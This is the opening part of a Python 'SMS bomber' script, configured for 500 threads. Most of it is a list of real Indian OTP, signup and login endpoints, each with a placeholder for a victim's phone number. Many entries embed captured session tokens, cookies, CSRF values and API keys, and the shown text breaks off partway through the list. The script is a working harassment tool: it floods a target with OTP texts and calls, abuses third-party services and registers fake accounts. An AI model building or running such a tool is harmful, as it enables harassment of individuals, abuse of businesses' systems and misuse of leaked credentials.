import os
import sys
import json
import random
import time
import threading
import requests
from requests.adapters import HTTPAdapter
from collections import defaultdict
from rich.console import Console
from rich import print as rprint
from fake_useragent import UserAgent

THREAD_COUNT = 500
STATS_REFRESH = 0.5

sent = 0
failed = 0
rate_limited = 0
lock = threading.Lock()
running = True
target = None

console = Console()

ua = UserAgent()
user_agents = [ua.random for _ in range(200)]

endpoints = [
    {"url": "https://api.hotstar.com/um/v3/users/037a0fe368304ec798c3a1480936a112/register?register-by=phone_otp", "method": "PUT", "headers": {"Host": "api.hotstar.com", "x-hs-usertoken": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ1bV9hY2Nlc3MiLCJleHAiOjE2MDE1NjE4NTksImlhdCI6MTYwMDk1NzA1OSwiaXNzIjoiVFMiLCJzdWIiOiJ7XCJoSWRcIjpcIjAzN2EwZmUzNjgzMDRlYzc5OGMzYTE0ODA5MzZhMTEyXCIsXCJwSWRcIjpcImQzZmU0ZDAyMzYxODRhNGFiYmE0M2Q0MDY2Y2RhYjBkXCIsXCJuYW1lXCI6XCJHdWVzdCBVc2VyXCIsXCJpcFwiOlwiMjQwOTo0MDYzOjRlMmI6N2FmZjo6NDc0OToyYTBjXCIsXCJjb3VudHJ5Q29kZVwiOlwiaW5cIixcImN1c3RvbWVyVHlwZVwiOlwibnVcIixcInR5cGVcIjpcImd1ZXN0XCIsXCJpc0VtYWlsVmVyaWZpZWRcIjpmYWxzZSxcImlzUGhvbmVWZXJpZmllZFwiOmZhbHNlLFwiZGV2aWNlSWRcIjpcImZhYTg4ZjA1LTc0MzItNDEwMy05ODg2LTdiZDkzNGY1YzNhMVwiLFwicHJvZmlsZVwiOlwiQURVTFRcIixcInZlcnNpb25cIjpcInYyXCIsXCJzdWJzY3JpcHRpb25zXCI6e1wiaW5cIjp7fX0sXCJpc3N1ZWRBdFwiOjE2MDA5NTcwNTkwOTh9IiwidmVyc2lvbiI6IjFfMCJ9.UJP1xZvNR_mGEN4ZVswMkkb1VZhHJL60XtObL48Izcc", "content-type": "application/json", "x-hs-platform": "PCTV", "x-country-code": "IN", "x-hs-device-id": "faa88f05-7432-4103-9886-7bd934f5c3a1", "hotstarauth": "st=1600957099~exp=1600963099~acl=/um/v3/*~hmac=dc2680f8d081c49647a2cfe43d4f67b015729c23514d944d46281373208e951d", "x-hs-appversion": "5.0.40", "x-request-id": "faa88f05-7432-4103-9886-7bd934f5c3a1", "origin": "https://www.hotstar.com", "referer": "https://www.hotstar.com/in/subscribe/sign-in"}, "json": {"phone_number": "REPLACE_WITH_TARGET", "country_prefix": "91"}},
    {"url": "https://api.cloud.altbalaji.com/accounts/mobile/verify?domain=IN", "method": "POST", "headers": {"Host": "api.cloud.altbalaji.com", "X-API-KEY": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Ik1TalA5OXV4OGhLazFrS1UifQ.eyJwaG9uZV9udW1iZXIiOiI5NTE5ODc0NzA0IiwiY291bnRyeV9jb2RlIjoiOTEiLCJwbGF0Zm9ybSI6IndlYiIsImV4cCI6MTYwMTA0MzI4OTEyN30.oNzgLsMqF8n9jroKUG9F3cXR90Wm1OyJLvVuG-XaklE", "Content-Type": "application/json", "Origin": "https://www.altbalaji.com", "Referer": "https://www.altbalaji.com/user-detail?pid=NTU%3D"}, "json": {"phone_number": "REPLACE_WITH_TARGET", "country_code": "91", "platform": "web", "exp": 1601043289127}},
    {"url": "https://us-central1-vootdev.cloudfunctions.net/usersV3/v3/checkUser", "method": "POST", "headers": {"Host": "us-central1-vootdev.cloudfunctions.net", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://www.voot.com", "Referer": "https://www.voot.com/"}, "json": {"type": "mobile", "mobile": "REPLACE_WITH_TARGET", "countryCode": "+91"}},
    {"url": "https://apiv2.sonyliv.com/AGL/1.6/A/ENG/WEB/IN/CREATEOTP", "method": "POST", "headers": {"Host": "apiv2.sonyliv.com", "device_id": "5836d9e1f6cb4f029bb44161b37c4fa0-1600956156120", "security_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MDA5NTYxMDgsImV4cCI6MTYwMjI1MjEwOCwiYXVkIjoiKi5zb255bGl2LmNvbSIsImlzcyI6IlNvbnlMSVYiLCJzdWIiOiJzb21lQHNldGluZGlhLmNvbSJ9.I8vEXYZ4J6shgQzIOLWTq8ig7WALBfj42Bng0hPG8DKJjM5iEKrUL3uhK0KrUdR_K-_ZygrGjaLzMxsP4-n3iR7Tiof_uSjNZ9-LntnHGDB1yTASX4ix4luUOew547IpjalclVbpR0-eJ3HTaFaSkM06L0ahK9Xj5GUxfxGLODv0ROYLMR26v0BF6z23pl1M-_C9voY_HJ6R_aZ4jItQjeJre11NxHcPnf8rU16QDIn6Oxxw5fHCaVpFRIWfs_3BdTz2fONzIO7o0n-sJk8w_TnFQy--8QQ6ZWIL1snd1v-2jvh4L59zjy5TVZJopmWnUUUxWRtiTQzGvx-ifqjUEaZBujHS8Ll1g5bp5oiWYfUEJskP3kPa7iopY19B6Xp_ondgsbW34tpX6uyZ5ZcW58E9wVyNwNmhcanWySxoPjI_Ng0dhXD5H03Z9yfbe6RnZcealVYBmD6ogTdh4V6Q41IyZcPOQelKNJT0XCwzExpZUQ4Ly7VTZIk8j4PFuJvmgFA6CvnYIjf0rAZR9cnLBq7quU4W9n07ngSsBuVG7KRGxV9qB98goaGrgepx0EJH-kAIWsfyWEdORLCLo-FykORLUXPFOEULd2rINn5i_mspSkyg6_UUHUWV8nMqhyjP4zVLeIMXyNusDLSMHvW5PmpBVDSNl-oWkr4dITLE_cc", "Content-Type": "application/json", "session_id": "cc86326a51504133bacd3ce4f796e1cf-1600956156256", "x-via-device": "true", "app_version": "3.1.20", "Origin": "https://www.sonyliv.com", "Referer": "https://www.sonyliv.com/"}, "json": {"channelPartnerID": "MSMIND", "mobileNumber": "REPLACE_WITH_TARGET", "country": "IN", "timestamp": "2020-09-24T14:03:03.505Z"}},
    {"url": "https://mobile.medplusindia.com/mobilemvc/profile/register.mbl", "method": "POST", "headers": {"Host": "mobile.medplusindia.com", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://www.medplusmart.com", "Referer": "https://www.medplusmart.com/"}, "data": "recieveUpdates=1&firstName=Tsunami&lastName=Bomber&emailId=tsunami@gmail.com&password=U7d5iChk9ZWzrv%24&confirmpwd=U7d5iChk9ZWzrv%24&mobileNumber=REPLACE_WITH_TARGET&SESSIONID=17C83B4A90182E8DA6F4F15755A43027&isCordova=false&isPhonepeSwitch=false"},
    {"url": "https://webapi.apollo247.com/", "method": "POST", "headers": {"Host": "webapi.apollo247.com", "Authorization": "Bearer 3d1833da7020e0602165529446587434", "Content-Type": "application/json", "Origin": "https://www.apollo247.com", "Referer": "https://www.apollo247.com/medicines?gclid=CjwKCAjwh7H7BRBBEiwAPXjadvKY3NSyNG-0yNkxp2qz2Jd5T0_zltNV3OnwoDFh3ECOsNImtyi1KxoCQY0QAvD_BwE"}, "json": {"operationName": "Login", "variables": {"mobileNumber": "+91REPLACE_WITH_TARGET", "loginType": "PATIENT"}, "query": "query Login($mobileNumber: String!, $loginType: LOGIN_TYPE!) {\n  login(mobileNumber: $mobileNumber, loginType: $loginType) {\nstatus\nmessage\nloginId\n__typename\n  }\n}\n"}},
    {"url": "https://m.netmeds.com/mst/rest/v1/id/details/REPLACE_WITH_TARGET", "method": "GET", "headers": {"Host": "m.netmeds.com", "Referer": "https://m.netmeds.com/customer/account/login", "Cookie": "G_ENABLED_IDPS=google; _gat_UA-63910444-1=1; cto_bundle=SX3iw19aZ0xrcWZ0TFFXN1huJTJGJTJGbklkaDl5ZnM2UmxQeHhLNDhMb3dxQ2dTSUU1VSUyRkVnU0g0dG5UODVJTzNIbVNSMFJwR2hZQVpGeDJGYVBlVG5scUIlMkJCM3lCOXBlZ21jMm1HTzNwZXMlMkZxSWk4TEM3eXNUYXhjTFBKbUdqQWM2NFhBTWFHS09EUmJMaDRGUVVHVHVGcWxaR2tRJTNEJTNE; liteprompt=disabled; bsCoId=3600942736100; _gat=1; bsUl=0; _gac_UA-63910444-1=1.1600942724.CjwKCAjwh7H7BRBBEiwAPXjadtM9O5MLH1ElhMO8FUbm9EprCPA4YXhxBk-XdN8ytuKetkzNGCI07xoCi1MQAvD_BwE; _gcl_aw=GCL.1600942724.CjwKCAjwh7H7BRBBEiwAPXjadtM9O5MLH1ElhMO8FUbm9EprCPA4YXhxBk-XdN8ytuKetkzNGCI07xoCi1MQAvD_BwE; _we_wk_gls_ss_=N4IgfgjArAxgbABgEYwJYgFylQOwC4yYQA0IMAhjqgCYDOmA2uBAjElAOwIICcIAugF9BQAA; _fbp=fb.1.1600942681371.1005200013; _gid=GA1.3.195334206.1600942680; _ga=GA1.3.1470493032.1600942680; _ALGOLIA=anonymous-14e705f0-f47c-495b-bd5d-0cfefde9056b; _gcl_au=1.1.505450095.1600942677"}},
    {"url": "https://getinstacash.in/sell/getData.php", "method": "POST", "headers": {"Host": "getinstacash.in", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://getinstacash.in", "Referer": "https://getinstacash.in/sell/login", "X-Requested-With": "XMLHttpRequest", "Cookie": "webInsta=rvg3l166pmfpeh6mi6auisshc7; G_ENABLED_IDPS=google; _ga=GA1.2.1994009459.1600927837; _gid=GA1.2.2093909779.1600927837; _gat_gtag_UA_46718346_7=1; __zlcmid=10LjSWRMCN11wY9"}, "data": "type=sendOTP&mobile=REPLACE_WITH_TARGET"},
    {"url": "https://www.fbbonline.in/customer/account/GenerateOtp", "method": "POST", "headers": {"Host": "www.fbbonline.in", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "https://www.fbbonline.in", "Referer": "https://www.fbbonline.in/customer/account/create"}, "data": "YII_CSRF_TOKEN=6ea54179a7dc67c7ed0d6847f76d6204320976eb&RegistrationForm%5Bsignup_page%5D=1&RegistrationForm%5Bcontact_number%5D=REPLACE_WITH_TARGET&RegistrationForm%5Bvalid_mobile%5D=1&RegistrationForm%5Bemail%5D=tsunami%40gmail.com&RegistrationForm%5Bvalid_email%5D=1&RegistrationForm%5Bfirst_name%5D=hdhdhd&RegistrationForm%5Blast_name%5D=bsbdb&RegistrationForm%5Bpassword%5D=hdhdbfbfv&RegistrationForm%5Btc_opt_in%5D=on&validate_otp="},
    {"url": "https://grofers.com/v2/accounts/", "method": "POST", "headers": {"Host": "grofers.com", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://grofers.com", "Referer": "https://grofers.com/", "device_id": "a11f656b-422e-4617-953b-c350d517467d", "auth_key": "57546838840176547788289acae69dd58e49de36b8d924c34e4310ec45824e13", "app_client": "consumer_web"}, "data": "user_phone=REPLACE_WITH_TARGET"},
    {"url": "https://m.snapdeal.com/signupCompleteAjax", "method": "POST", "headers": {"Host": "m.snapdeal.com", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://m.snapdeal.com", "Referer": "https://m.snapdeal.com/signin", "x-c": "eyJ3YXAiOnsiY3BkcCI6ImZhbHNlIiwic2RhdGEiOiIyIiwicG92IjoidHJ1ZSJ9LCJzYyI6eyJtbCI6IjMiLCJjb2RfYiI6ImZhbHNlIiwiZGFfYXMiOiJ2ZXIyIiwic2hpcHBpbmdfaW50ZXJ2YWwiOiI5OHAzIn0sImNtcyI6eyJ2biI6IjAifSwicHMiOnsic3BfaW5jbCI6InRydWUiLCJzcF9zbGFiIjoiRCIsInVybCI6IkM0In19"}, "data": "j_password=null&j_mobilenumber=REPLACE_WITH_TARGET&agree=true&j_confpassword=null&journey=mobile&numberEdit=false&swp=true&j_fullname=uyuhyntuhy"},
    {"url": "https://www.zomato.com/webroutes/auth/login", "method": "POST", "headers": {"Host": "www.zomato.com", "x-zomato-csrft": "a6b0c09972b2bdd30c9c1b6552caee5d", "Content-Type": "application/json", "Origin": "https://www.zomato.com", "Referer": "https://www.zomato.com/kanpur"}, "json": {"country_id": 1, "phone": "REPLACE_WITH_TARGET", "verification_type": "sms", "method": "phone"}},
    {"url": "https://www.cuemath.com/api/v4/parents/", "method": "POST", "headers": {"Host": "www.cuemath.com", "Content-Type": "application/JSON", "Origin": "https://www.cuemath.com", "Referer": "https://www.cuemath.com/the-ultimate-cuemath-olympiad/partner/timesofindia/register/?intent=ultimate-olympiad"}, "json": {"intl_mobile": {"phone": ""}, "phone": "REPLACE_WITH_TARGET", "email": "nsbd@dn.djs", "full_name": "hdhdhdg", "place_id": "ChIJYYhT3gl3AjoRUDlkL1i5oIk", "timezone": "Asia/Calcutta", "detail_source": "CMO_2020", "form_fields": "full_name,phone,email,place_id"}},
    {"url": "https://www.dream11.com/graphql/mutation/pwa/register", "method": "POST", "headers": {"Host": "www.dream11.com", "device": "pwa", "x-csrf": "fb1f1947-4547-392d-9a28-a9de30d9e766", "Content-Type": "application/json", "Origin": "https://www.dream11.com", "Referer": "https://www.dream11.com/register?ru="}, "json": {"query": "mutation register( $email: String! $mobileNumber: String! $password: String! $site: String) { registerSendOTPMutation( email: $email mobileNumber: $mobileNumber password: $password site: $site ) { message }}", "variables": {"email": "tsunami@gmail.com", "mobileNumber": "REPLACE_WITH_TARGET", "password": "tsunami@123astronomia"}}},
    {"url": "https://doubtnut.com/api/v1/user/login", "method": "POST", "headers": {"Host": "doubtnut.com", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://doubtnut.com", "Referer": "https://doubtnut.com/login"}, "data": "phone=REPLACE_WITH_TARGET"},
    {"url": "https://user.vedantu.com/user/preLoginVerification", "method": "POST", "headers": {"Host": "user.vedantu.com", "Content-Type": "application/json", "Origin": "https://www.vedantu.com", "Referer": "https://www.vedantu.com/masterclass?utm_source=in&utm_medium=in_ggl_cpa&utm_campaign=ggl_Brand_Search&utm_term=ggl_Brand_Search_Exact_Brand_Vedantu&utm_content=in_Brand_Search_Exact_Brand_Vedantu_Ad2&gclsrc=aw.ds&&gclid=CjwKCAjwwab7BRBAEiwAapqpTE-qUv3xAL_Y1Rs3cYtcuY-Jd04tW69qYrb2EEESdVOTJ-50d9_fNRoCqNcQAvD_BwE"}, "json": {"email": None, "phoneCode": "+91", "phoneNumber": "REPLACE_WITH_TARGET", "ver": "11.345"}},
    {"url": "https://unacademy.com/api/v3/user/user_check/", "method": "POST", "headers": {"Host": "unacademy.com", "Authorization": "Bearer undefined", "Content-Type": "application/json", "Origin": "https://unacademy.com", "Referer": "https://unacademy.com/login"}, "json": {"phone": "REPLACE_WITH_TARGET", "country_code": "IN", "otp_type": 1, "email": "", "send_otp": True, "is_un_teach_user": False}},
    {"url": "https://bcas-prod.byjusweb.com/api/send-otp", "method": "POST", "headers": {"Host": "bcas-prod.byjusweb.com", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://byjus.com", "Referer": "https://byjus.com/byjus-classes-book-a-free-demo-class/registration/?utm_source=google&utm_mode=CPA&utm_campaign=K12-Brand-Android-BYJU%27S-India-Apr10&utm_term=byjus&gclid=EAIaIQobChMIzKCzs5396wIVVqqWCh0TgQO4EAAYASAAEgK-V_D_BwE"}, "data": "phoneNumber=REPLACE_WITH_TARGET&page=free-trial-classes"},
    {"url": "https://m.redbus.in/api/getOtp?number=REPLACE_WITH_TARGET&cc=91&whatsAppOpted=undefined", "method": "GET", "headers": {"Host": "m.redbus.in", "Referer": "https://m.redbus.in/preregister"}},
    {"url": "https://www.careers360.com/ajax/no-cache/user/otp-send", "method": "POST", "headers": {"Host": "www.careers360.com", "X-CSRFToken": "9tKY96jb358WKiZBMwhz2EcranwljWDbxdqrQCnvqQWXNGbIvtfEQQLCbrzA8ssj", "X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://www.careers360.com", "Referer": "https://www.careers360.com/user/otp-verify/101e8d6e591af6688f640eee08f5a5f8?destination=&click_location=header&google_success=header"}, "data": "mobile_number=REPLACE_WITH_TARGET&method=call&uid=12692588"},
    {"url": "https://api.coolwinks.com/api/accounts/is_already_registered/?username=REPLACE_WITH_TARGET", "method": "GET", "headers": {"Host": "api.coolwinks.com", "Origin": "https://www.coolwinks.com", "Referer": "https://www.coolwinks.com/"}},
    {"url": "https://webapi.cansell.in/api/User/SignUp", "method": "POST", "headers": {"Host": "webapi.cansell.in", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://m.cansell.in", "Referer": "https://m.cansell.in/register"}, "json": {"name": "Uwusjsj", "surname": "wjeshs", "email": "hsjs@gmail.com", "phone": "REPLACE_WITH_TARGET", "password": "eeeeee"}},
    {"url": "https://jsso1.indiatimes.com/sso/crossapp/identity/native/registerOnlyMobile", "method": "POST", "headers": {"Host": "jsso1.indiatimes.com", "Content-Type": "application/json; charset=utf-8", "appVersion": "8.9.0", "channel": "gaana.com", "tgid": "j9qcq0z2ur4llq2a58qqmag2", "sdkVersion": "1.0", "appVersionCode": "933", "deviceId": "j9qcq0z2ur4llq2a58qqmag2", "platform": "android", "sdkVersionCode": "1"}, "json": {"mobile": "+91-REPLACE_WITH_TARGET"}},
    {"url": "https://1.rome.api.flipkart.com/1/action/view", "method": "POST", "headers": {"Host": "1.rome.api.flipkart.com", "Content-Type": "application/json", "Origin": "https://www.flipkart.com", "Referer": "https://www.flipkart.com/login?ret=%2F%3Faffid%3Dsiteplug%26affExtParam1%3De2f29ff2e3dd9e65eb9e419d30dc8135&entryPage=HOMEPAGE_HEADER_ACCOUNT&sourceContext=DEFAULT", "x-user-agent": "Mozilla/5.0 (Linux; U; Android 8.1.0; en-us; CPH1909 Build/O11019) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.134 Mobile Safari/537.36 OppoBrowser/2.2.5FKUA/msite/0.0.3/msite/Mobile"}, "json": {"actionRequestContext": {"type": "LOGIN_IDENTITY_VERIFY", "loginIdPrefix": "+91", "loginId": "REPLACE_WITH_TARGET", "clientQueryParamMap": {"ret": "/?affid=siteplug&affExtParam1=e2f29ff2e3dd9e65eb9e419d30dc8135", "entryPage": "HOMEPAGE_HEADER_ACCOUNT"}, "loginType": "MOBILE", "verificationType": "OTP", "screenName": "LOGIN_V4_MOBILE", "sourceContext": "DEFAULT"}}},
    {"url": "https://ullu.app/ulluCore/api/v1/otp/sendRegisterOTP?mobileNumber=REPLACE_WITH_TARGET", "method": "POST", "headers": {"Host": "ullu.app", "Origin": "https://ullu.app", "Referer": "https://ullu.app/"}},
    {"url": "https://accounts.paytm.com/v2/api/register", "method": "POST", "headers": {"Host": "accounts.paytm.com", "Content-Type": "application/json", "Origin": "https://accounts.paytm.com", "Referer": "https://accounts.paytm.com/oauth2/authorize?theme=mp-html5&redirect_uri=https%3A%2F%2Fpaytm.com%2Fv1%2Fapi%2Fauthresponse&is_verification_excluded=false&client_id=paytm-web-secure&type=web_server&scope=paytm&response_type=code"}, "json": {"email": "", "mobile": "REPLACE_WITH_TARGET", "loginPassword": "Pura@1090", "csrfToken": "f7ea628c-91a2-5f14-82ca-6f7eee295b1d", "redirectUri": "https://paytm.com/v1/api/authresponse", "clientId": "paytm-web-secure", "scope": "paytm", "state": "", "responseType": "code", "theme": "mp-html5", "dob_agreement": True}},
    {"url": "https://ogonn.in/otp", "method": "POST", "headers": {"Host": "ogonn.in", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://ogonn.in", "Referer": "https://ogonn.in/login", "X-Requested-With": "XMLHttpRequest"}, "data": "_token=I10LMVWBAN1c30T8SbgVHHvlKFTgTU1iFTm7hlfl&mobile=REPLACE_WITH_TARGET"},
    {"url": "https://digital.aakash.ac.in/signup-otp-verify", "method": "POST", "headers": {"Host": "digital.aakash.ac.in", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://digital.aakash.ac.in", "Referer": "https://digital.aakash.ac.in/user/register", "X-Requested-With": "XMLHttpRequest"}, "data": "&mobileval=REPLACE_WITH_TARGET"},
    {"url": "https://www.swiggy.com/mapi/auth/signup", "method": "POST", "headers": {"Host": "www.swiggy.com", "Content-Type": "application/json", "Origin": "https://www.swiggy.com", "Referer": "https://www.swiggy.com/auth/register"}, "json": {"name": "dbdbdbd", "email": "tsunami@gmail.com", "password": "sndndndbdj283jsbsbs", "referral_code": "", "mobile": "REPLACE_WITH_TARGET", "_csrf": "jK7JY3E9u8xJ-1Q_DUwsGnPDhccbB4rGz0dKIbfk"}},
    {"url": "https://www.limeroad.com/auth/get_uuid_v2?ajax=true&ret=https://www.limeroad.com/myaccount/orders?ajax=true&mobileOnly=false&doAction=", "method": "POST", "headers": {"Host": "www.limeroad.com", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://www.limeroad.com", "Referer": "https://www.limeroad.com/feed_nup_v1?feed_kyc=true&gender=Men"}, "data": "utf8=%E2%9C%93&authenticity_token=6686Dtpby7plpvjXr5%2Fe8oyPdiQ3Weta9Y9ydzSRP64%3D&user_id=REPLACE_WITH_TARGET"},
    {"url": "https://www.cilory.com/app/w/auth/soft", "method": "POST", "headers": {"Host": "www.cilory.com", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://www.cilory.com", "Referer": "https://www.cilory.com/authentication?back=%2Fmy-account"}, "json": {"mobile": "REPLACE_WITH_TARGET"}},
    {"url": "https://login.web.ajio.com/api/auth/accountCheck", "method": "POST", "headers": {"Host": "login.web.ajio.com", "Content-Type": "application/json", "Origin": "https://www.ajio.com", "Referer": "https://www.ajio.com/signup?referrer=/my-account/"}, "json": {"emailId": "tsunami@gmail.com"}},
    {"url": "https://login.web.ajio.com/api/auth/signupSendOTP", "method": "POST", "headers": {"Host": "login.web.ajio.com", "Content-Type": "application/json", "Origin": "https://www.ajio.com", "Referer": "https://www.ajio.com/signup?referrer=/my-account/"}, "json": {"firstName": "Tsunami Bomber", "login": "tsunami@gmail.com", "password": "kd34646@3131nxnxn", "genderType": "", "mobileNumber": "REPLACE_WITH_TARGET", "requestType": "SENDOTP"}},
    {"url": "https://in.bookmyshow.com/pwa/api/uapi/otp/send", "method": "POST", "headers": {"Host": "in.bookmyshow.com", "Content-Type": "application/json", "Origin": "https://in.bookmyshow.com", "Referer": "https://in.bookmyshow.com/login/otp?referer=/my-profile&phoneNumber=REPLACE_WITH_TARGET&email=&source=web"}, "json": {"channel": "phone", "subChannel": "sms", "details": {"phone": "REPLACE_WITH_TARGET", "origin": "https://in.bookmyshow.com"}}},
    {"url": "https://www.bigbasket.com/mapi/v4.0.0/member-svc/otp/send/", "method": "POST", "headers": {"Host": "www.bigbasket.com", "Content-Type": "application/json", "Origin": "https://www.bigbasket.com", "Referer": "https://www.bigbasket.com/auth/login/", "x-csrftoken": "gHbsx6okji95qhYgKApxE9vPjHhYlpBkgVd73fh23WRxl9XfmikiznVB1Jy2X2ED", "x-channel": "BB-PWA"}, "json": {"identifier": "REPLACE_WITH_TARGET"}},
    {"url": "https://cod.flomattress.com/api/otp", "method": "POST", "headers": {"Host": "cod.flomattress.com", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://www.flomattress.com", "Referer": "https://www.flomattress.com/account/register"}, "data": "number=REPLACE_WITH_TARGET&store=hushbedding.myshopify.com"},
    {"url": "https://m.banggood.in/index.php?com=login&t=sendMtSms&c=api", "method": "POST", "headers": {"Host": "m.banggood.in", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://m.banggood.in", "Referer": "https://m.banggood.in/login.html"}, "data": "mobilePhone=REPLACE_WITH_TARGET&countryPhoneCode=91&type=1&verifyCode=KmUu"},
    {"url": "https://api.lenskart.com/v2/customers/sendOtp", "method": "POST", "headers": {"Host": "api.lenskart.com", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://www.lenskart.com", "Referer": "https://www.lenskart.com/customer/account/login", "x-api-client": "mobilesite"}, "json": {"telephone": "REPLACE_WITH_TARGET"}},
    {"url": "https://www.urbanclap.com/api/v2/growth/profile/generateOTP", "method": "POST", "headers": {"Host": "www.urbanclap.com", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://www.urbancompany.com", "Referer": "https://www.urbancompany.com/", "x-client-key": "f4113c23a68c9cb3bf695c4490f9f3da9abc8674712f5b870906ec26bab7602aed85ad71640e8d9f785ea09db5a298a950b335adc5b8cbb6ce58209e2912eac6"}, "json": {"country_id": "IND", "phone": {"isd_code": "+91", "phone_wo_isd": "REPLACE_WITH_TARGET"}, "device_type": "customer"}},
    {"url": "https://www.quikr.com/core/sendOtp?_t=0e2ed2ef8cff0015a917b9cf98ccaea3", "method": "POST", "headers": {"Host": "www.quikr.com", "Content-Type": "application/x-www-form-urlencoded;charset=UTF-8", "Origin": "https://www.quikr.com", "Referer": "https://www.quikr.com/SignIn?redirect=https%3A%2F%2Fwww.quikr.com%2F"}, "data": "user=REPLACE_WITH_TARGET&CSRFKey=login_csrf_token&CSRFValue=2d798470b2fb7b96d59d41ce289f6b88&token=03AGdBq250swygN0BZpSQUIeR3kzgOs7dzUMwPxeC99DpmRiCqpfyUMLfFITJT6V6KAV8T94vfhY7IY0gDg4DK5Vy8SEhGXg5XrKqRI1K6YqQwTOCWu9w6cwVSXhTXFXPraD6tYAumNW92Czo3wer9VOEmbYDZpvVVT3kgLzbFCPGu_BZjakj6dF1LkyajBiiWDqSiV15D73atPRfUdo_7CAjBrtzEyyKorYztttEWIhqMI-wKXL_EGtyDAhDRVnQKIjKvMzW4vVYSUWiQ5ffKM7KUlNvy8QJAIYD-3sJ-TT9mD5WP1KgPuw8dbyDvLFv36q7-IDMJYWU0nZXa6Ot8rVPqqqAkCZcoCcLcCHPFGj_pheOOkoEEo7E022NTJBPHxXUVA7fJP8zqXFWjajX0ljFT6iZj5qB5yEOviiTj1kTtt1xmfea7Zs7WtwV9QKd5ytbheE-VUAxoFcRff-6zXSSerEXVdwv892fnnhSVbYWH3pABRoyr2Wh1RVBpYREY8fYihyu9V358&v3=true"},
    {"url": "https://www.kotak.com/811-savingsaccount-ZeroBalanceAccount/811/save-home-mobile.action?source=VKYCIL&banner=ILVKYClaunch&pubild=VKYClaunchmailer_1696_&SWNToken=1603857481489&flw=vkyc", "method": "POST", "headers": {"Host": "www.kotak.com", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "https://www.kotak.com", "Referer": "https://www.kotak.com/811-savingsaccount-ZeroBalanceAccount/811/vkyc-home.action?source=VKYCIL&banner=ILVKYClaunch&pubild=VKYClaunchmailer_1696_"}, "data": "cust_full_name=Tsunami+Bomber&cust_email=tsunami%40gmail.com&cust_mobile=REPLACE_WITH_TARGET&cust_political_disclaimer=Yes&cust_fatca_disclaimer=Yes"},
    {"url": "https://www.kotak.com/811-savingsaccount-ZeroBalanceAccount/811/resend-otp0on-call.action?SWNToken=1603857646468&flw=vkyc", "method": "POST", "headers": {"Host": "www.kotak.com", "Origin": "https://www.kotak.com", "Referer": "https://www.kotak.com/811-savingsaccount-ZeroBalanceAccount/811/otp-mobile.action?SWNToken=1603857646468&flw=vkyc"}},
    {"url": "https://m.happyeasygo.com/heg_api/user/sendRegisterOTP.do?phone=91%20REPLACE_WITH_TARGET&verifycode=FDCA", "method": "GET", "headers": {"Host": "m.happyeasygo.com", "Referer": "https://m.happyeasygo.com/register", "x-device": "mobile"}},
    {"url": "https://mapi.makemytrip.com/ext/web/pwa/isUserRegistered?region=in&language=eng&currency=inr", "method": "POST", "headers": {"Host": "mapi.makemytrip.com", "Content-Type": "application/json", "Origin": "https://www.makemytrip.com", "Referer": "https://www.makemytrip.com/", "deviceid": "a3d2f892-af4d-40d1-808a-db6286b8fe1f", "currency": "inr", "language": "eng", "authorization": "h4nhc9jcgpAGIjp", "visitor-id": "a3d2f892-af4d-40d1-808a-db6286b8fe1f", "region": "in"}, "json": {"loginId": "REPLACE_WITH_TARGET", "type": "MOBILE", "version": 2, "countryCode": "91"}},
    {"url": "https://accounts.olacabs.com/api/login", "method": "POST", "headers": {"Host": "accounts.olacabs.com", "Content-Type": "application/json", "Origin": "https://accounts.olacabs.com", "Referer": "https://accounts.olacabs.com/?serviceType=p2p&when=NOW&utm_source=widget_on_olacabs&pickup_name=Current%20Location&drop_lat=26.7729751&drop_lng=82.1457934&drop_name=Faizabad,%20Uttar%20Pradesh%20India&pickup=&lat=26.7705619&lng=82.151815&cid=687045355.1603884269", "x-fingerprint-id": "3664542227", "csrf-token": "v3z6FhSz-2Bc4HBdVkPPXegy_3coRLVxGv4I", "x-requested-with": "XMLHttpRequest"}, "json": {"mobileNumber": "REPLACE_WITH_TARGET", "dialingCode": "+91", "countryCode": "IN", "headers": {}, "verificationId": None, "captchaInfo": {"gcaptcha": "03AGdBq26mRWBEeBGcFIqhyewjUTfv-Cl4msB5OR3-1NN-IS9kKj3JDAR6MxB0rvNMfhCRqxJccxbUSndGyJvojv2ohDgNe2q8683oSNoD624E20bLqeo6ViMHsgogMvgSmKQUlummiZfr3MUM39UW0T8yJkG1OAEO9-HWTK-wZkEG7bgpxoGFrh1Cw4WwIGPnVZ4-pmulwlAbDCqsgqahK9ngTb8S-EPZu7tFR1srJDE8nF4WhHUR8qsLR1ijem1sNsrdi2-_IihHp3GZqisH1Izt-dmuGW-zSYWyHmZ5EtNcZEk4iA0rxlPpru-n0fxN8RjAH7z4dJJ3vhish9hcyhYYSriKYmiFZzrwO1T72BQrXyx8Xk_zf6YnHwzZms-NEdojlOt87D-t45Fm31IXnTBcTM1-TXZmKCoia6k1kGZmk1arWUMNuSq0SNMh6g42XZ59_I14q_qhM9qF7lMNaSbYOaRQnjlLkA", "fingerPrint": 3664542227, "storageId": "16038843100270vLePjUljyT3B4eOO8Qvp0VNZ5l"}}},
